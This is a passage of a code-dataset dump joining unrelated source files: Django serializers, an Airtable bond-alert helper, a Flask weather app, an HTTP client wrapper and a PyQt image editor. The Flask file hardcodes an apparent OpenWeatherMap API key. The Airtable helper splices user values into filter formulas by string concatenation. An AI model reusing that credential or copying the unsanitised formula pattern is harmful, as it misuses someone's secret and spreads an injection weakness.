ret = super(PostSerializer, self).to_representation(instance)
# Here we filter the null values and creates a new dictionary
# We use OrderedDict like in original method
ret = OrderedDict(list(filter(lambda x: x[1], ret.items())))
return ret
"""
class SinglePostSerializer(serializers.ModelSerializer):
author = serializers.ReadOnlyField(source='author.username')
#likes = serializers.StringRelatedField(many=True)
author_avatar = serializers.SerializerMethodField()
time_since = serializers.ReadOnlyField(source='FORMAT')
comments_count = serializers.SerializerMethodField()
likes_count = serializers.ReadOnlyField()
dislikes_count = serializers.ReadOnlyField()
reaction = serializers.SerializerMethodField()
# comments = serializers.SerializerMethodField()
class Meta:
"""
extra_kwargs = {'likes': {'read_only': True},
'dislikes': {'read_only': True}
}
"""
model = Post
fields = ("id","author", "author_avatar","time_since","reaction",
"content","likes_count","dislikes_count",
"mediafile","comments_count")
    def validate(self, data):
        if len(data['content']) <= 0 and data['mediafile'] is None:
            raise serializers.ValidationError(u'at least one field is required')
        return data
def get_author_avatar(self, obj, size=settings.AVATAR_DEFAULT_SIZE):
for provider_path in settings.AVATAR_PROVIDERS:
provider = import_string(provider_path)
avatar_url = provider.get_avatar_url(obj.author, size)
if avatar_url:
return avatar_url
def get_comments_count(self, post):
""" get the number of comments for single post """
return Comment.objects.filter(parent=post).count()
""" def get_comments(self, post):
data = Comment.objects.filter(parent=post)
paginator = CommentsPageNumberPagination()
page = paginator.paginate_queryset(data, self.context['request'])
serializer = CommentSerializer(page, many=True).data
return paginator.get_paginated_response(serializer).data"""
def get_reaction(self, post):
reaction = None
request = self.context.get("request")
if request and hasattr(request, "user"):
if post.likes.filter(id=request.user.id).exists():
reaction = 'liked'
elif post.dislikes.filter(id=request.user.id).exists():
reaction = 'disliked'
return reaction
class PostLikesSerializer(serializers.ModelSerializer):
username = serializers.ReadOnlyField()
avatar = serializers.SerializerMethodField()
class Meta:
model = User
fields = ("username","avatar")
def get_avatar(self, obj, size=settings.AVATAR_DEFAULT_SIZE):
for provider_path in settings.AVATAR_PROVIDERS:
provider = import_string(provider_path)
avatar_url = provider.get_avatar_url(obj, size)
if avatar_url:
return avatar_url
class PostReportListSerializer(serializers.ModelSerializer):
reports_count = serializers.SerializerMethodField()
url = serializers.HyperlinkedIdentityField(
view_name='posts-detail',
read_only=True
)
class Meta:
model= Post
fields = ('id', 'reports_count', 'url',)
def get_reports_count(self,post):
return post.reports.count()
```
#### File: happy/posts/validators.py
```python
import os
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
def validate_file_extension_and_size(value):
valid_extensions = ['.jpg','.png','.mp4','.gif']
MAX_UPLOAD_SIZE = 5242880
ext = os.path.splitext(value.name)[1]
if not ext.lower() in valid_extensions:
raise ValidationError(_('Unsupported file extension.'))
if ext.lower() in valid_extensions:
        if value.size > MAX_UPLOAD_SIZE:
            raise ValidationError(
                _('%(file_name)s has not been uploaded: File too big.'),
                params={'file_name': value.name})
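# (Editor's note) Hypothetical wiring via a model field:
#   mediafile = models.FileField(validators=[validate_file_extension_and_size])
# MAX_UPLOAD_SIZE of 5242880 bytes is exactly 5 MiB.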
``` |
{
"source": "0xRusowsky/discord-bots",
"score": 3
} |
#### File: src/bond_alerts/airtable_utils.py
```python
import os
from pyairtable import Table
from pyairtable.formulas import match
from collections import namedtuple
# Initialize Airtable
api_key = os.environ['AIRTABLE_API_KEY']
alerts_app = 'appTX60pjw7iWGz4Y'
alerts_table = 'tblkVGjvsmwrI7vMn'
master_data_app = 'appAQXkU6sdPuQ1p6'
bonds_table = 'tbl5zIl9EZKaras54'
tokens_table = 'tblQLIlas6IBvWz6Y'
alert_db = Table(api_key, alerts_app, alerts_table)
bond_db = Table(api_key, master_data_app, bonds_table)
token_db = Table(api_key, master_data_app, tokens_table)
Bond = namedtuple("Bond", "bond price_usd discount max_purchase debt_reached")
Token = namedtuple("Token", "token price_klima")
Alert = namedtuple("Alert", "bond discount user")
def search_alert(table: Table, search_bond: str = None, search_user: str = None, search_discount: float = None, search_active: bool = None, search_type: str = None):  # noqa: E501
    formula = None
if search_type == 'triggered':
if search_bond is not None and search_discount is not None:
formula = "AND({active}=1,{bond}='"+str(search_bond)+"',{discount}<='"+str(search_discount)+"')" # noqa: E501
elif search_type == 'reactivate':
if search_bond is not None and search_discount is not None:
formula = "AND({active}=0,{bond}='"+str(search_bond)+"',{discount}>'"+str(search_discount)+"')" # noqa: E501
else:
if search_bond is not None and search_user is not None and search_discount is not None:
formula = "AND({bond}='"+str(search_bond)+"',{user}='"+str(search_user)+"',{discount}<='"+str(search_discount)+"')" # noqa: E501
elif search_user is not None and search_discount is not None:
formula = "AND({user}='"+str(search_user)+"',{discount}<='"+str(search_discount)+"')"
elif search_bond is not None and search_user is not None:
formula = match({'bond': search_bond, 'user': search_user})
elif search_bond is not None:
formula = match({'bond': search_bond})
elif search_user is not None:
formula = match({'user': search_user})
elif search_discount is not None:
formula = "AND({discount}<='"+str(search_discount)+"')"
    if formula is None:
        # no recognised combination of search criteria was supplied
        return []
    r = table.all(formula=formula)
rr = []
if r is not None:
for a in r:
rr.append(Alert(a['fields']['bond'], a['fields']['discount'], a['fields']['user']))
return(rr)
def activate_alert(table: Table, search_bond: str, search_user: str, search_discount: float):
formula = match({'bond': search_bond, 'user': search_user, 'discount': search_discount})
r = table.first(formula=formula)
table.update(r['id'], {'active': True})
def deactivate_alert(table: Table, search_bond: str, search_user: str, search_discount: float):
formula = match({'bond': search_bond, 'user': search_user, 'discount': search_discount})
r = table.first(formula=formula)
table.update(r['id'], {'active': False})
def fetch_bond_md(table: Table, search_bond: str):
formula = match({'bond': search_bond, 'active': True})
r = table.first(formula=formula)
if r is not None:
return(r['fields']['address'], r['fields']['quote_token'])
def fetch_token_md(table: Table, search_token: str):
formula = match({'token': search_token})
r = table.first(formula=formula)
if r is not None:
return(r['fields']['pool_address'], r['fields']['pool_base_token'])
def fetch_bond_info(table: Table, search_bond: str):
formula = match({'bond': search_bond, 'active': True})
r = table.first(formula=formula)
if r is not None:
if 'debt_reached' in r['fields']:
return(Bond(r['fields']['bond'], r['fields']['price_usd'], r['fields']['discount'], r['fields']['max_purchase'], r['fields']['debt_reached'])) # noqa: E501
else:
return(Bond(r['fields']['bond'], r['fields']['price_usd'], r['fields']['discount'], r['fields']['max_purchase'], False)) # noqa: E501
def fetch_token_info(table: Table, search_token: str):
formula = match({'token': search_token})
r = table.first(formula=formula)
if r is not None:
return(r['fields']['price_klima'], r['fields']['price_usd'])
def active_bonds(table: Table):
formula = match({'active': True})
r = table.all(formula=formula)
if r is not None:
rr = []
for b in r:
rr.append(b['fields']['bond'])
return(rr)
def active_tokens(table: Table):
formula = match({'active': True})
r = table.all(formula=formula)
if r is not None:
rr = []
for b in r:
rr.append(b['fields']['token'])
return(rr)
def update_bond_info(table: Table, update_bond: str, update_price: float, update_disc: float, update_capacity: float, update_debt: bool): # noqa: E501
formula = match({'bond': update_bond})
r = table.first(formula=formula)
table.update(r['id'], {'price_usd': update_price, 'discount': update_disc, 'max_purchase': update_capacity, 'debt_reached': update_debt}) # noqa: E501
def update_token_info(table: Table, update_token: str, update_price_klima: float, update_price_usd: float):
formula = match({'token': update_token})
r = table.first(formula=formula)
table.update(r['id'], {'price_klima': update_price_klima, 'price_usd': update_price_usd})
def add_alert(table: Table, add_bond: str, add_discount: float, add_user: str):
bond_check = fetch_bond_info(bond_db, add_bond)
if bond_check is not None:
alert_check = search_alert(table, search_user=add_user)
if len(alert_check) < 5:
for a in alert_check:
if a == (add_bond, float(add_discount), add_user):
# Alert already configured
return(0)
# All checks passed, create alert
try:
table.create({'bond': add_bond, 'user': add_user, 'discount': add_discount})
return(1)
except Exception as e:
print(e)
return(-999)
else:
# User already has 5 alerts configured
return(-1)
else:
# Bond does not exist or not active anymore
return(-2)
def remove_alert(table: Table, delete_bond: str, delete_discount: float, delete_user: str):
formula = match({'bond': delete_bond, 'user': delete_user, 'discount': delete_discount})
r = table.first(formula=formula)
if r is not None:
try:
table.delete(r['id'])
return(1)
except Exception as e:
print(e)
return(-999)
else:
# Alert does not exist
return(0)
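# Hypothetical usage sketch (editor's addition; the bond name and Discord user
# handle are made up). add_alert returns 1 (created), 0 (already configured),
# -1 (per-user limit of 5 reached), -2 (unknown or inactive bond), -999 (API error):
#   status = add_alert(alert_db, 'BCT', 5.0, 'user#1234')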
``` |
{
"source": "0xsakthi/Weather-app",
"score": 3
} |
#### File: 0xsakthi/Weather-app/app.py
```python
from flask import Flask, render_template, request
import pyowm
app = Flask(__name__)
@app.route('/')
def main():
return render_template('index.html')
@app.route('/send', methods=['POST','GET'])
def send():
city = request.form['city'].upper()
zipc = request.form['zipcode']
owm = pyowm.OWM('1afed1bcc62bc124f1824838273eed19')
mgr = owm.weather_manager()
obs = mgr.weather_at_zip_code('{}'.format(zipc),'IN')
weather = obs.weather
temperature = weather.temperature(unit='celsius')['temp']
res1 = f'The Temperature : {temperature} degrees celsius.'
res2 = 'The Current weather Of {}'.format(city)
humidity = weather.humidity
res3 = f'Humidity : {humidity}'
current = weather.detailed_status
res4 = f'Currently : {current}'
return render_template('index.html',res1=res1, res2=res2,res3=res3,res4=res4)
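# (Editor's note) Hypothetical local entry point; the original file relies on
# an external runner such as `flask run`:
#   if __name__ == '__main__':
#       app.run(debug=True)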
``` |
{
"source": "0xsamsar/MetaFarmerX",
"score": 3
} |
#### File: adapters/apis/http_client.py
```python
import json
import requests
class HTTPClient(object):
"""
Wraps HTTP Client with custom filtering
"""
    def __init__(self, _uri='', _query=None, _filter=True, _filter_keys=None):
        self._uri = _uri
        self._query = _query if _query is not None else {}
        self._timeout = 5
        self._filter = _filter
        self._filter_keys = _filter_keys if _filter_keys is not None else []
        self._response_json = {}
##########################################################################
def get_response(self):
"""
Get response
"""
return self._response_json
##########################################################################
def filter_response(self):
"""
        Filter response by accessing key pairs in the json object
"""
if self._filter:
json_obj = self._response_json
for key in self._filter_keys:
json_obj = json_obj[key]
self._response_json = json.dumps(json_obj)
##########################################################################
def send_request(self):
"""
Send HTTP request
"""
try:
self._response = requests.get(self._uri, params=self._query, timeout=self._timeout)
self._response_json = self._response.json()
self._response.raise_for_status()
except requests.exceptions.HTTPError as errh:
print(errh)
except requests.exceptions.ConnectionError as errc:
print(errc)
except requests.exceptions.Timeout as errt:
print(errt)
except requests.exceptions.RequestException as err:
print(err)
##########################################################################
def call(self):
"""
Call the API
"""
        self.send_request()
        self.filter_response()
        if hasattr(self, '_response'):
            self._response.close()
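    # Hypothetical usage sketch (editor's addition; the URL and filter keys
    # are made up):
    #   client = HTTPClient('https://api.example.com/v1/price',
    #                       _query={'symbol': 'KLIMA'},
    #                       _filter_keys=['data', 'price'])
    #   client.call()
    #   print(client.get_response())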
``` |
{
"source": "0xsapphir3/GalleryMan",
"score": 2
} |
#### File: GalleryMan/assets/editorButtonsHelper.py
```python
from GalleryMan.utils.imageDoodler import doodleImage
from GalleryMan.assets.cropper import ImageCropper
from GalleryMan.utils.infoFinder import getMoreInfo
import os
from functools import partial
from PIL import Image
from PyQt5.QtCore import (
QAbstractAnimation,
QParallelAnimationGroup,
QPoint,
QRect,
QRectF,
QSize,
QThread,
QVariant,
QVariantAnimation,
Qt,
pyqtBoundSignal,
    pyqtSignal,
    pyqtSlot,
)
from GalleryMan.assets.QEditorButtons import FilterView, PaletteView
from configparser import ConfigParser
from PyQt5.QtGui import (
QFont,
QFontMetrics,
QImage,
QKeySequence,
QMouseEvent,
QPixmap,
QTransform,
)
from PyQt5.QtWidgets import (
QApplication,
QDialog,
QGraphicsScene,
QGraphicsView,
QHBoxLayout,
QLabel,
QLineEdit,
QMainWindow,
QScrollArea,
QShortcut,
QSlider,
QVBoxLayout,
QWidget,
)
from GalleryMan.assets.QtHelpers import (
Animation,
PopUpMessage,
QCustomButton,
QLayoutMaker,
QSliderMenu,
)
from json import loads
from GalleryMan.utils.helpers import *
from GalleryMan.utils.stickersArena import stickersViewer
import sys
class CustomLabel(QLabel):
"""A Custom, Clickable Label"""
clicked = pyqtSignal(QPoint)
def __init__(self, parent=None, listenFor=Qt.LeftButton):
super().__init__(parent=parent)
# Make the listenFor variable global
self.listenFor = listenFor
def mouseReleaseEvent(self, event: QMouseEvent):
# Check for the mouse release event
if event.button() == self.listenFor:
# Emit the clicked function
self.clicked.emit(event.pos())
self.eventPos = event.pos()
    def click(self):
        self.clicked.emit(QPoint())
class QRotateLabel(QLabel):
"""A Custom, Rotatable `QLabel`"""
def __init__(self, *args, **kwargs):
super(QRotateLabel, self).__init__(*args, **kwargs)
# Make the pixmap global
self._pixmap = QPixmap()
# A variable to store current rotation
self.curr = 0
# Initial degree
self.initial = 0
# Init animation
self.init_ani()
def init_ani(self):
# Create a animation
self._animation = QVariantAnimation(
self,
startValue=self.initial,
endValue=self.curr,
duration=100,
valueChanged=self.on_valueChanged,
)
# Set the initial value with the current degree
self.initial = self.curr
def set_pixmap(self, pixmap):
# Change the pixmap
self._pixmap = pixmap
# Set the pixmap
self.setPixmap(self._pixmap)
def start_animation(self, deg):
# Check if animation isn't running
if self._animation.state() != QAbstractAnimation.Running:
# Swap the degrees
self.curr, self.initial = deg, self.curr
# Create a animation with new degree
self.init_ani()
# Start the animation
self._animation.start()
def get_curr_deg(self):
return self.curr % 360
@pyqtSlot(QVariant)
def on_valueChanged(self, value):
# Rotate the pixmap
t = QTransform()
t.rotate(value)
self.setPixmap(self._pixmap.transformed(t))
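        # (Editor's note) Each animation tick re-renders the cached original
        # pixmap through a fresh QTransform, so repeated rotations never
        # accumulate resampling error.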
class QEditorHelper:
LIKED_FOLDERS = os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "likedFolders.txt")
    exited = pyqtSignal()
def __init__(
self,
parent: QApplication,
application: QMainWindow,
central: QWidget,
config: ConfigParser,
newParent: QScrollArea,
out_widget,
callback,
dir: str,
main_window: QLabel
) -> None:
# Make every args global
self.callback = callback
self.main_window = main_window
self.parent = parent
self.application = application
self.original = newParent.widget().layout()
self.newParent = newParent
self.out_widget = out_widget
self.config = config
self.central = central
self.dir = dir
        # Make a popup message instance
self.popup = PopUpMessage()
# Hide the scrollArea to switch the buttons with the new buttons
self.animation = Animation.fadingAnimation(Animation, self.central, 200, True)
# Start the animation
self.animation.start()
# Again show the scroll area when finished
self.animation.finished.connect(self.central.show)
def addtoLiked(self, directory_path, inst):
# Get the heart widget
self.heartWidget = inst.heartWidget
# Get the icons
icons = inst.iconStyles
# Read all the currently liked photos
with open(self.LIKED_FOLDERS) as file:
dirs = loads(file.read())
# Check if the directory that will be added to liked is already there or not
if directory_path in dirs:
            # Remove it from liked if it is already there
AddToLiked(self.application, directory_path, True).run()
# Show a new message
self.popup.new_msg(self.application, "Image Removed From Liked Images", 400)
# Change its color
self.heartWidget.setStyleSheet(
"color: {}; font-size: {}px; font-family: {}".format(
icons[0], icons[1], icons[2]
)
)
else:
# Add to liked
AddToLiked(self.application, directory_path).run()
# New message
self.popup.new_msg(self.application, "Image Added To Liked Images", 400)
            # Change colors
self.heartWidget.setStyleSheet(
"color: {}; font-size: {}px; font-family: {}".format(
"#BF616A", icons[1], icons[2]
)
)
def copyToClipboard(self, fileName):
# Add the image to the application's clipboard
self.parent.clipboard().setPixmap(QPixmap(fileName))
self.popup.new_msg(self.application , "Image Copied To Clipboard" , 400)
def showEditButtons(self, directory):
# Callback when animation is over
def animation_callback():
# Hide the scrollArea and change the buttons while it is hidden
self.newParent.hide()
new_label.setGeometry(self.newParent.takeWidget().geometry())
new_label.setLayout(self.globalLayout)
self.newParent.setWidget(new_label)
# Show the scrollArea
self.animation = Animation.fadingAnimation(
Animation, self.central, 200, True
)
self.animation.start()
self.animation.finished.connect(self.newParent.show)
        # Get the preferred icons
self.icons = loads(self.config.get("singleFolder", "editButtons-icons"))
# Create an instance of the handler of this layout
editButtons = ImageEditButtons(
self,
directory,
self.application,
self.newParent,
self.config,
self.out_widget,
)
# Make a layout from the buttons and function
self.functions = [
editButtons.flipImage,
editButtons.rotater,
editButtons.cropImage,
editButtons.filterImage,
editButtons.stickerImage,
editButtons.doodleImage,
editButtons.addTextToImage,
editButtons.imageAdjustment,
lambda: self.swapLayout(self.original),
]
self.globalLayout = QLayoutMaker(self.icons, self.functions).make()
# Change the layout
editButtons.inst = self.globalLayout
# Animate
new_label = QLabel()
self.animation = Animation.fadingAnimation(Animation, self.central, 300)
self.animation.start()
self.animation.finished.connect(animation_callback)
def swapLayout(self, layout):
def animation_callback():
self.newParent.hide()
new_label.setGeometry(self.newParent.takeWidget().geometry())
new_label.setLayout(layout)
self.newParent.setWidget(new_label)
self.animation = Animation.fadingAnimation(
Animation, self.central, 200, True
)
self.animation.start()
self.animation.finished.connect(self.newParent.show)
new_label = QLabel()
self.animation = Animation.fadingAnimation(Animation, self.central, 300)
self.animation.start()
self.animation.finished.connect(animation_callback)
def moveToTrash(self, directory):
        # Move the directory to the app's trash folder
try:
os.replace(
directory,
os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "trashFiles" , directory[directory.rindex("/") + 1 :])
)
        except OSError:
print(bcolors.WARNING + "The image may have been deleted or moved. Exiting...")
exit(0)
# Now open the trash file logs and add a entry
with open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "trashLogs.txt"), "r") as f:
now = dict(loads(f.read()))
now[
os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "trashFiles" , directory[directory.rindex("/") + 1 :])
] = directory
# Write the updated information
with open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "trashLogs.txt"), "w") as f:
f.write(dumps(now))
# Animate
self.animation = QParallelAnimationGroup()
self.animation.addAnimation(
Animation.fadingAnimation(Animation, self.out_widget.parent(), 300)
)
self.animation.addAnimation(
Animation.fadingAnimation(Animation, self.central, 300)
)
self.animation.start()
self.animation.finished.connect(self.out_widget.hide)
self.animation.finished.connect(self.central.hide)
# Add a new message when its completed
self.popup.new_msg(self.application, "Item Moved To Trash", 400)
if("--show" in sys.argv):
print(bcolors.OKCYAN + "Exiting... As you have closed the window for the --show session.")
exit(1)
self.callback()
def moreInfo(self, directory):
# Get preferred icons
self.icons = loads(self.config.get("singleFolder", "moreOptions-icons"))
        # Create an instance of the handler
moreInfo = getMoreInfo(
self.newParent, self.out_widget, directory, self.application
)
# Merge the buttons with the function
self.func = [
moreInfo.getInfo,
moreInfo.rename,
moreInfo.showInFullScreen,
moreInfo.callback,
]
# Make the layout and swap
self.layout = QLayoutMaker(self.icons, self.func).make()
self.swapLayout(self.layout)
def closeWithSave(self , directory):
self.dialog = QDialog(self.application)
buttonsLayout = QHBoxLayout()
save = QCustomButton("Save and Close" , None).create()
save.setFixedWidth(230)
save.setStyleSheet("""
color: #FFF;
font-size: 20px;
font-family: Comfortaa;
border: 1px solid #3B4252;
padding: 10px
""")
buttonsLayout.addWidget(save , alignment=Qt.AlignLeft)
save.clicked.connect(self.save)
discard = QCustomButton("Discard and Close" , None).create()
discard.setStyleSheet("""
color: #FFF;
font-size: 20px;
font-family: Comfortaa;
border: 1px solid #3B4252;
padding: 10px
""")
discard.clicked.connect(self.discard)
discard.setFixedWidth(230)
        buttonsLayout.addWidget(discard, alignment=Qt.AlignRight)
self.dialog.setLayout(buttonsLayout)
self.dialog.setFixedSize(500 , 100)
self.dialog.exec_()
def discard(self):
if("--show" in sys.argv):
print(bcolors.WARNING + "Image from being saved was discarded. Exiting")
exit(1)
self.dialog.hide()
self.callback()
def save(self):
parent = self.dir[:self.dir.rindex("/")]
file = self.dir[self.dir.rindex("/") + 1:self.dir.rindex(".")] + '-edited.png'
os.replace(os.path.join("GalleryMan" , "assets" , "processed_image.png" ) , os.path.join(parent , file))
if("--show" in sys.argv):
print(bcolors.OKCYAN + "\nImage was saved as {}. Exiting...\n".format(os.path.join(parent , file)))
exit(1)
self.dialog.hide()
self.callback()
class ImageEditButtons:
def __init__(
self,
inst,
dir,
parent: QMainWindow,
outParent: QScrollArea,
config: ConfigParser,
renderArea: QRotateLabel,
) -> None:
self.msg = "app"
self.originalGeo = outParent.widget().geometry()
# Make all the args global
self.parent = parent
self.originalWidget = outParent.widget()
self.dir = dir
self.originalResponser = parent.resizeEvent
self.inst = inst
self.outParent = outParent
self.renderArea = renderArea
self.config = config
self.original = outParent.widget().layout()
def rotater(self):
        # Get the preferred icons
        icons = loads(self.config.get("singleFolder", "editorRotater-icons"))
        # An input box to show the current degree
        self.sliderValue = QLineEdit()
        # Make an instance of the handler function
self.interiorFunctions = cropImage(
self.dir, self.outParent, self.renderArea, self.sliderValue, self.handleFunc
)
# Make a layout
func = [
lambda: self.interiorFunctions.rotate90(),
lambda: self.interiorFunctions.rotate90Right(),
lambda: self.interiorFunctions.save(self.callback),
lambda: self.callback(),
]
parentLayout = QVBoxLayout()
childLayout = QHBoxLayout()
# Add the slider to layout
self.slider = QSlider(self.outParent)
# Set fixed maximum and minimum values
self.slider.setMaximum(360)
self.slider.setMinimum(0)
self.slider.valueChanged.connect(self.rotateLabel)
# Some Stylings
self.slider.setStyleSheet(
"""
QSlider::groove:horizontal{{
background-color: {};
border-radius: {}px;
border: {}px solid {}
}}
QSlider::handle:horizontal{{
width: {}px;
height: {}px;
color: {};
border-radius: {}px;
border: {}px solid {};
}}
""".format(
self.config.get("singleFolder", "slider-backgroundColor"),
self.config.get("singleFolder", "slider-borderRadius"),
self.config.get("singleFolder", "slider-borderWidth"),
self.config.get("singleFolder", "slider-borderColor"),
self.config.get("singleFolder", "slider-holderWidth"),
self.config.get("singleFolder", "slider-holderHeight"),
self.config.get("singleFolder", "slider-holderColor"),
self.config.get("singleFolder", "slider-holderRadius"),
self.config.get("singleFolder", "slider-holderBorderWidth"),
self.config.get("singleFolder", "slider-holderColor"),
)
)
        # set the value to 0 for the first time
self.sliderValue.setText("0")
# Rotate the label when the text is changed
self.sliderValue.textChanged.connect(partial(self.rotateLabel , "textBox"))
# Set orientation
self.slider.setOrientation(Qt.Horizontal)
# Stylings
self.sliderValue.setStyleSheet(
"""
border-radius: {}px;
border: {}px solid {};
color: {};
background-color: {}
""".format(
self.config.get("singleFolder" , "input-borderRadius"),
self.config.get("singleFolder" , "input-borderWidth"),
self.config.get("singleFolder" , "input-borderColor"),
self.config.get("singleFolder" , "input-textColor"),
self.config.get("singleFolder" , "input-backgroundColor"),
))
# Fixed size
self.sliderValue.setFixedSize(QSize(
int(self.config.get("singleFolder" , "input-width")),
int(self.config.get("singleFolder" , "input-height"))
))
# Add to layouts
childLayout.addWidget(self.slider)
childLayout.addWidget(self.sliderValue)
parentLayout.addLayout(childLayout)
# Make layout
layout = QLayoutMaker(icons, func).make()
# Swap layout
parentLayout.addLayout(layout)
self.swapLayout(parentLayout)
def handleFunc(self):
self.msg = "custom"
self.slider.setValue(int(self.sliderValue.text()))
def cropImage(self):
        # Instantiate the cropper class
cropper = ImageCropper(self.parent, self.renderArea , self.config)
# Show the cropper
cropper.show()
def filterImage(self):
        # Instantiate the filter class
filters = FilterView(
self.parent,
self.renderArea,
self.outParent,
loads(self.config.get("singleFolder", "filters-colorIcons")),
self.callback,
)
# Functions and make a layout
func = [
lambda: filters.shady(),
lambda: filters.sepia(),
lambda: filters.cherry(),
lambda: filters.underwater(),
lambda: filters.purple(),
lambda: filters.pink(),
lambda: filters.dark(),
lambda: filters.clear(),
lambda: filters.realistic(),
lambda: filters.cool_filter(),
lambda: filters.grayscale(),
lambda: filters.remove_self(),
]
layout = QLayoutMaker(
loads(self.config.get("singleFolder", "filters-colorIcons")), func
).make()
# Swap layout
self.swapLayout(layout)
def stickerImage(self):
# Create a sticker viewer instance
myStickers = stickersViewer(self.parent , self.renderArea, self.outParent , self.callback)
# Show the stock
myStickers.initStock()
def doodleImage(self):
# Initate the class
doodle = doodleImage(self.parent, self.renderArea, self.outParent , self.dir)
# get all the respective functions
func = [
lambda: doodle.freeHand(),
lambda: doodle.drawRect(),
lambda: doodle.line(),
lambda: doodle.circle(),
lambda: doodle.polygon(),
lambda: doodle.floodImage(),
self.callback
]
        # Get the preferred icons
icons = loads(self.config.get("singleFolder" , "doodler-icons"))
# Make the layout and swap
layout = QLayoutMaker(icons, func).make()
self.swapLayout(layout)
def swapWidget(self , newWidget):
def run_second():
self.outParent.setWidget(newWidget)
self.animation = Animation.fadingAnimation(Animation , self.outParent.parent() , 200 , True)
self.animation.finished.connect(self.outParent.show)
self.animation.start()
self.animation = Animation.fadingAnimation(Animation , self.outParent.parent() , 200)
self.animation.finished.connect(run_second)
self.animation.start()
def addTextToImage(self):
        # Instantiate the text-in-image class
textToImage = textInImage(self.parent, self.renderArea, self.outParent , self.dir)
# Create the graphics
textToImage.createGraphics()
def imageAdjustment(self):
        # Get the preferred icons
icons = loads(self.config.get("singleFolder", "filter-icons"))
        # Instantiate the handler class
view = PaletteView(
None,
os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"),
self.renderArea,
self.config,
)
# Get respective functions and make layout
func = [
lambda: view.blur(),
lambda: view.sharp(),
lambda: view.increaseBrightness(),
lambda: view.increaseContrast(),
lambda: view.increaseExposure(),
self.callback
]
layout = QLayoutMaker(icons, func).make()
# Swap layout
self.swapLayout(layout)
def flipImage(self):
# Create a image flipper class' instance
flipper = imageFlipper(self.renderArea, self.outParent)
# Get the respective functions
func = [
lambda: flipper.flipLeft(),
lambda: flipper.flipTop(),
lambda: self.callback(),
]
        # Get the preferred icons
icons = loads(self.config.get("singleFolder", "flipper-icons"))
# Swap the layout
layout = QLayoutMaker(icons, func).make()
self.swapLayout(layout)
def swapLayout(self, layout):
# Get the main widget
self.central = self.outParent.parent()
# Animation callback
def animation_callback():
# Hide the area when it is being formatted
self.outParent.hide()
new_label.setGeometry(self.outParent.takeWidget().geometry())
new_label.setLayout(layout)
self.outParent.setWidget(new_label)
# Show on complete
self.animation = Animation.fadingAnimation(
Animation, self.central, 200, True
)
self.animation.start()
self.animation.finished.connect(self.outParent.show)
# Animate
new_label = QLabel()
self.animation = Animation.fadingAnimation(Animation, self.outParent.parent(), 500)
self.animation.finished.connect(animation_callback)
self.animation.start()
def callback(self , geometry=None):
self.icons = loads(self.config.get("singleFolder", "editButtons-icons"))
self.renderArea.setPixmap(QPixmap(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png")))
self.functions = [
self.flipImage,
self.rotater,
self.cropImage,
self.filterImage,
self.stickerImage,
self.doodleImage,
self.addTextToImage,
self.imageAdjustment,
lambda: self.swapLayout(self.original)
]
self.layout = QLayoutMaker(self.icons, self.functions).make()
self.new_label = QLabel()
# if(geometry == None):
self.new_label.setGeometry(self.outParent.takeWidget().geometry())
# else:
# self.new_label.setGeometry(geometry)
self.new_label.setLayout(self.layout)
self.outParent.setWidget(self.new_label)
self.swapLayout(self.layout)
def rotateLabel(self , _from="slider"):
if(self.msg == "custom"):
self.msg = "app"
return
if(_from == "textBox"):
self.interiorFunctions.fixedIncrease(int(self.sliderValue.text()))
self.slider.setValue(int(self.sliderValue.text()))
return
self.interiorFunctions.fixedIncrease(self.slider.value())
class cropImage:
SAVE_DIR = os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png")
def __init__(
self, dir: str, newParent, renderArea: QRotateLabel, outDisplay: QLineEdit, callback
) -> None:
# Make every args global
self.directory = dir
self.image = Image.open(self.directory)
self.outDisplay = outDisplay
self.renderArea = renderArea
self.rotations = 0
self.callback = callback
self.degree = 0
self.newParent = newParent
def rotate90(self):
# Add 90 to the degree
self.degree += 90
# Add rotation
self.rotations += 1
self.updateUi()
def rotate90Right(self):
# Subtract the rotation (due to reverse rotation)
self.degree -= 90
self.rotations -= 1
self.updateUi()
def customIncrease(self , increase):
# Subtract the rotation (due to reverse rotation)
self.degree += increase
self.updateUi()
def fixedIncrease(self , const):
self.degree = const
self.updateUi()
def updateUi(self):
# Update the text
self.outDisplay.setText(str(abs(self.degree) % 360))
# Start the animation
self.renderArea.start_animation(abs(self.degree) % 360)
# Update the image
self.updateImage()
self.callback()
def updateImage(self):
# Update the pillow image
self.image = Image.open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
def swapLayout(self, layout):
# Get the central widget of the QScrollArea
self.central = self.newParent.parent()
# Callback
def animation_callback():
# Hide the scrollArea while it is updated
self.newParent.hide()
new_label.setGeometry(self.newParent.takeWidget().geometry())
new_label.setLayout(layout)
self.newParent.setWidget(new_label)
# Show the widget
self.animation = Animation.fadingAnimation(
Animation, self.central, 200, True
)
self.animation.start()
self.animation.finished.connect(self.newParent.show)
# Animate
new_label = QLabel()
self.animation = Animation.fadingAnimation(Animation, self.central, 300)
self.animation.start()
self.animation.finished.connect(animation_callback)
def save(self, callback):
# Open the image using PIL
image = Image.open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png")).convert("RGBA")
# Rotate the image
image = image.rotate(-(self.degree % 360), expand=1, fillcolor=(255, 0, 0, 1))
# Save the image
image.save(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
self.degree = 0
self.rotations = 0
# Call the callback
callback()
class textInImage:
def __init__(self, parent, out_widget, scrollArea , dir) -> None:
# Make every argument global
self.dir = dir
self.parent = parent
self.out_widget = out_widget
self.scrollArea = scrollArea
# Create graphics
self.graphics = QGraphicsView(self.parent)
# Call the responser on resize Event
self.graphics.resizeEvent = self.responser
# Show the graphics
self.graphics.show()
# Create a dictionary of the styling
self.storedValue = {
"color": "#D8DEE9",
"font-family": "Comfortaa",
"font-size": 60,
"text": "Your Text"
}
# Create a menu
self.menu = QSliderMenu(self.graphics)
        # A button which will show the menu
self.startAni = QCustomButton(" ", self.graphics).create()
self.startAni.move(QPoint(
self.parent.width() - self.startAni.width() - 10,
10
))
self.startAni.clicked.connect(lambda: self.manageMenu())
self.startAni.show()
self.current = 0
